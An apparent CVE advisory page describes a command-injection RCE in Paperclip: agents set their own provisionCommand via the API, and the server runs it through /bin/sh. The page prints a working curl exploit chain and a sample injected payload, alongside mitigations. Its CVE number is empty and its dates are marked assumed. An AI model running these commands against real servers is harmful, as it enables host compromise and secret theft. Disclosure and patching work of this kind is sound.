Paperclip, Privilege Escalation, CVE() (critical)

Listen to this Post

How the mentioned CVE works:

The vulnerability allows an attacker with an Agent API key to execute arbitrary OS commands on the Paperclip server host. The root cause is that agents can update their own `adapterConfig` via the `PATCH /api/agents/:id` endpoint. The validation schema uses z.record(z.unknown()), permitting arbitrary keys. An attacker injects `adapterConfig.workspaceStrategy.provisionCommand` with a malicious shell command. Later, during workspace provisioning, the server calls `runWorkspaceCommand()` which executes `spawn(“/bin/sh”, [“-c”, command])` without validation or escaping. The attacker triggers execution via POST /api/agents/:id/wakeup. This breaks the trust boundary: agent-controlled configuration becomes host-level command execution. No board or admin access is required. The affected file is server/src/services/workspace-runtime.ts. The exploit chain: obtain agent API key → PATCH agent config with `provisionCommand` → wakeup agent → server spawns shell with injected command → RCE on host. The PoC writes a marker file `poc_rce.txt` to confirm execution.

dailycve form:

Platform: Paperclip
Version: All (before patch)
Vulnerability: Privilege escalation RCE
Severity: Critical
date: 2025-04-16 (disclosure assumed)

Prediction: 2025-05-01

What Undercode Say:

Identify agent ID
curl -X GET https://paperclip-server/api/agents/me -H "Authorization: Bearer pcp_xxxxxxxxxxxxx"
Inject malicious provisionCommand
curl -X PATCH https://paperclip-server/api/agents/{agentId} -H "Authorization: Bearer pcp_xxx" -H "Content-Type: application/json" -d '{"adapterConfig":{"workspaceStrategy":{"type":"git_worktree","provisionCommand":"echo PAPERCLIP_RCE > /tmp/poc.txt"}}}'
Trigger execution
curl -X POST https://paperclip-server/api/agents/{agentId}/wakeup -H "Authorization: Bearer pcp_xxx"
Verify
ls -la /tmp/poc.txt

How Exploit:

Attacker obtains Agent API key (e.g., from compromised agent or exposed secret). Sends PATCH to `/api/agents/:id` with JSON: {"adapterConfig":{"workspaceStrategy":{"provisionCommand":"id > /tmp/exploit; reverse-shell"}}}. Then calls wakeup. Server runs spawn("/bin/sh","-c","id > /tmp/exploit; reverse-shell"). No sanitization allows full OS command injection.

Protection from this CVE:

  1. Reject agent modification of `workspaceStrategy.provisionCommand` via API guard.

2. Use allowlist for allowed configuration keys.

  1. Replace `spawn(“/bin/sh”,”-c”,command)` with structured execution (e.g., spawn(binary, args)).

4. Validate input: reject shell metacharacters `|&;$“.

5. Run workspace provisioning in isolated container/sandbox.

Impact:

Remote code execution on Paperclip server host. Attacker can read env vars, exfiltrate secrets, modify repos, access DB credentials, spawn reverse shells, persist on host. Full compromise of deployment environment and all managed agents.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top